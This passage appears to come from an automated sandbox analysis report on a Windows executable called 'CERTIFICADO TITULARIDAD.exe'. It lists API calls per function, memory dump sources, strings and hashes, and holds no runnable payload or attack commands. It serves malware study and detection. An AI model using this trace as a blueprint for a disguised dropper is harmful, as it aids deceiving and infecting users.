                                                                                                                          • lstrcpyW.KERNEL32(00000808,?), ref: 73F71D7F
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 73F71D92
                                                                                                                          • GlobalFree.KERNEL32(?), ref: 73F71E74
                                                                                                                          • GlobalFree.KERNEL32(?), ref: 73F71E79
                                                                                                                          • GlobalFree.KERNEL32(?), ref: 73F71E7E
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 73F72068
                                                                                                                          • lstrcpyW.KERNEL32(?,?), ref: 73F72222
                                                                                                                          • GetModuleHandleW.KERNEL32(00000008), ref: 73F722A1
                                                                                                                          • LoadLibraryW.KERNEL32(00000008), ref: 73F722B2
                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 73F7230C
                                                                                                                          • lstrlenW.KERNEL32(00000808), ref: 73F72326
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2659336751.0000000073F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 73F70000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2659279507.0000000073F70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2659368168.0000000073F74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2659420622.0000000073F76000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_73f70000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 245916457-0
                                                                                                                          • Opcode ID: fb9e35cc319bf7e6764767c8e28958f545ef995bf0e62a4d10570dc4db5feae9
                                                                                                                          • Instruction ID: d0d51091e4c45f2a1e3f0c12ed0612c9b48e166c34ee7b48ff683571ccc24d32
                                                                                                                          • Opcode Fuzzy Hash: fb9e35cc319bf7e6764767c8e28958f545ef995bf0e62a4d10570dc4db5feae9
                                                                                                                          • Instruction Fuzzy Hash: A922CE72D10A0AEBDB11CFA4C9807EEB7F5FB08385F94452FD1A6E2290D7749689CB50
                                                                                                                          APIs
                                                                                                                          • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040222E
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\subprovince, xrefs: 0040226E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateInstance
                                                                                                                          • String ID: C:\Users\user\subprovince
                                                                                                                          • API String ID: 542301482-2790155446
                                                                                                                          • Opcode ID: fa9b9c77b3530ce2a287439bb95ef55590dcf9a522a2fbed8be09240dc413261
                                                                                                                          • Instruction ID: 8307c529eb9feefa1617cd4f78f27985085e4fae61a1ffd37fb0b3adda41be3b
                                                                                                                          • Opcode Fuzzy Hash: fa9b9c77b3530ce2a287439bb95ef55590dcf9a522a2fbed8be09240dc413261
                                                                                                                          • Instruction Fuzzy Hash: 00410575A00209AFCB40DFE4C989EAD7BB5FF48308B20456EF505EB2D1DB799982CB54
                                                                                                                          APIs
                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000010,?,00000040,00001018,73F72596,00000000,?), ref: 73F727D5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2659336751.0000000073F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 73F70000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2659279507.0000000073F70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2659368168.0000000073F74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2659420622.0000000073F76000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_73f70000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4275171209-0
                                                                                                                          • Opcode ID: 18c34001bba310965260996237d56bedc49008095096ce9fdd51ab52a32be1c1
                                                                                                                          • Instruction ID: 28b3074314d7ae1e924fe028b13724f7b3f47f80a129472743233d7f6bd8521b
                                                                                                                          • Opcode Fuzzy Hash: 18c34001bba310965260996237d56bedc49008095096ce9fdd51ab52a32be1c1
                                                                                                                          • Instruction Fuzzy Hash: F7F037B1540345DFE7219F39C925B817BE0FB09394FA54699E1EF9B2E0C3B46880CB50
                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404F25
                                                                                                                          • GetDlgItem.USER32(?,00000408), ref: 00404F30
                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F7A
                                                                                                                          • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F91
                                                                                                                          • SetWindowLongW.USER32(?,000000FC,0040551A), ref: 00404FAA
                                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FBE
                                                                                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FD0
                                                                                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404FE6
                                                                                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FF2
                                                                                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405004
                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00405007
                                                                                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405032
                                                                                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 0040503E
                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D9
                                                                                                                          • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405109
                                                                                                                            • Part of subcall function 004044D5: SendMessageW.USER32(00000028,?,00000001,00404300), ref: 004044E3
                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040511D
                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0040514B
                                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405159
                                                                                                                          • ShowWindow.USER32(?,00000005), ref: 00405169
                                                                                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405264
                                                                                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C9
                                                                                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052DE
                                                                                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405302
                                                                                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405322
                                                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 00405337
                                                                                                                          • GlobalFree.KERNEL32(?), ref: 00405347
                                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053C0
                                                                                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 00405469
                                                                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405478
                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 004054A3
                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 004054F1
                                                                                                                          • GetDlgItem.USER32(?,000003FE), ref: 004054FC
                                                                                                                          • ShowWindow.USER32(00000000), ref: 00405503
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                          • String ID: $M$N
                                                                                                                          • API String ID: 2564846305-813528018
                                                                                                                          • Opcode ID: 963d0e2195837636cb6f5b073c234fd9fc9862b141633064f8114fc5dd327728
                                                                                                                          • Instruction ID: 467e9106b9ab4b1e9b2d04e68362d71007c986f05034cc4a0cb7dcf353c6e141
                                                                                                                          • Opcode Fuzzy Hash: 963d0e2195837636cb6f5b073c234fd9fc9862b141633064f8114fc5dd327728
                                                                                                                          • Instruction Fuzzy Hash: 16029B70A00609EFDB20DF95DD45AAF7BB5FB44314F10817AE610BA2E1D7B98A42CF58
                                                                                                                          APIs
                                                                                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046FD
                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 00404711
                                                                                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040472E
                                                                                                                          • GetSysColor.USER32(?), ref: 0040473F
                                                                                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040474D
                                                                                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040475B
                                                                                                                          • lstrlenW.KERNEL32(?), ref: 00404760
                                                                                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040476D
                                                                                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404782
                                                                                                                          • GetDlgItem.USER32(?,0000040A), ref: 004047DB
                                                                                                                          • SendMessageW.USER32(00000000), ref: 004047E2
                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 0040480D
                                                                                                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404850
                                                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 0040485E
                                                                                                                          • SetCursor.USER32(00000000), ref: 00404861
                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 0040487A
                                                                                                                          • SetCursor.USER32(00000000), ref: 0040487D
                                                                                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048AC
                                                                                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048BE
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                          • String ID: Call$N
                                                                                                                          • API String ID: 3103080414-3438112850
                                                                                                                          • Opcode ID: d465d3d5382bb59059b47d3503e7a252332af71f120e52871dcbc052c6d80ab7
                                                                                                                          • Instruction ID: fa786ba7610ecb1ae21ae2169d8ef808fc0b2da043ab7544d4c43deaa2774949
                                                                                                                          • Opcode Fuzzy Hash: d465d3d5382bb59059b47d3503e7a252332af71f120e52871dcbc052c6d80ab7
                                                                                                                          • Instruction Fuzzy Hash: 7F61B3B1A00209BFDB10AF64DD85A6A7B79FB84354F00843AFB05B61D0D7B9AD61CF58
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2622546717.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_4b70000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: ====$====$====$====$====$====$====$====$====$====$====$====$====$====$====$====$====$====$====$====$====$====$====$====$====$====$====$====
                                                                                                                          • API String ID: 0-1980392700
                                                                                                                          • Opcode ID: 0d512bb697ccb100001d554872fbbdfd2784f2531d94a29df7d68a853d071a86
                                                                                                                          • Instruction ID: 0eb55ed161bd2c70784111b0a73533d25f44775f1cf3d860f5cac588d819e274
                                                                                                                          • Opcode Fuzzy Hash: 0d512bb697ccb100001d554872fbbdfd2784f2531d94a29df7d68a853d071a86
                                                                                                                          • Instruction Fuzzy Hash: ACC08C8781B1C1E2EA6A692000B41484F440E21404BA18C8FC0F2C1883C012ECE1DDA3
                                                                                                                          APIs
                                                                                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                          • DrawTextW.USER32(00000000,00428A20,000000FF,00000010,00000820), ref: 00401156
                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                          • String ID: F
                                                                                                                          • API String ID: 941294808-1304234792
                                                                                                                          • Opcode ID: fcc37e75e13d0dca8524aaa06a8ee829d240d30c68f9aadea354bd02ab1c226a
                                                                                                                          • Instruction ID: d1034cbb9d528375343357a353c0022e70e8214492c202610c441178c5bfc5cd
                                                                                                                          • Opcode Fuzzy Hash: fcc37e75e13d0dca8524aaa06a8ee829d240d30c68f9aadea354bd02ab1c226a
                                                                                                                          • Instruction Fuzzy Hash: FC417B71800249AFCB058FA5DE459AFBBB9FF45314F00802EF592AA1A0CB74DA55DFA4
                                                                                                                          APIs
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406302,?,?), ref: 004061A2
                                                                                                                          • GetShortPathNameW.KERNEL32(?,004265A8,00000400), ref: 004061AB
                                                                                                                            • Part of subcall function 00405F76: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F86
                                                                                                                            • Part of subcall function 00405F76: lstrlenA.KERNEL32(00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB8
                                                                                                                          • GetShortPathNameW.KERNEL32(?,00426DA8,00000400), ref: 004061C8
                                                                                                                          • wsprintfA.USER32 ref: 004061E6
                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00426DA8,C0000000,00000004,00426DA8,?,?,?,?,?), ref: 00406221
                                                                                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406230
                                                                                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406268
                                                                                                                          • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004261A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062BE
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 004062CF
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062D6
                                                                                                                            • Part of subcall function 00406011: GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe,80000000,00000003), ref: 00406015
                                                                                                                            • Part of subcall function 00406011: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406037
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                          • String ID: %ls=%ls$[Rename]
                                                                                                                          • API String ID: 2171350718-461813615
                                                                                                                          • Opcode ID: ad23c2c12608704314c1a1c2d98a70ea5e027cecb5ac03fef5858bd56b87dd73
                                                                                                                          • Instruction ID: d8f03b5b48010a369f687ed07a259b5d04d98e8e290d987932ab0f9f84d7b5e4
                                                                                                                          • Opcode Fuzzy Hash: ad23c2c12608704314c1a1c2d98a70ea5e027cecb5ac03fef5858bd56b87dd73
                                                                                                                          • Instruction Fuzzy Hash: 89313230201325BFD6207B659D48F2B3A6CDF41714F12007EBA02F62C2EA7D98218ABD
                                                                                                                          APIs
                                                                                                                          • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe",76233420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406832
                                                                                                                          • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406841
                                                                                                                          • CharNextW.USER32(?,"C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe",76233420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406846
                                                                                                                          • CharPrevW.USER32(?,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406859
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004067D0
                                                                                                                          • "C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe", xrefs: 00406813
                                                                                                                          • *?|<>/":, xrefs: 00406821
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Char$Next$Prev
                                                                                                                          • String ID: "C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                          • API String ID: 589700163-3846579867
                                                                                                                          • Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                                                                                          • Instruction ID: 2d41fa7b6770246c30beeceb47eb68b435a53440eacd13368e2f30b8c56315d6
                                                                                                                          • Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                                                                                          • Instruction Fuzzy Hash: A511935680121296DB303B14CC44ABB66E8AF54794F52C03FE999732C1E77C5C9296BD
                                                                                                                          APIs
                                                                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 00404524
                                                                                                                          • GetSysColor.USER32(00000000), ref: 00404562
                                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 0040456E
                                                                                                                          • SetBkMode.GDI32(?,?), ref: 0040457A
                                                                                                                          • GetSysColor.USER32(?), ref: 0040458D
                                                                                                                          • SetBkColor.GDI32(?,?), ref: 0040459D
                                                                                                                          • DeleteObject.GDI32(?), ref: 004045B7
                                                                                                                          • CreateBrushIndirect.GDI32(?), ref: 004045C1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
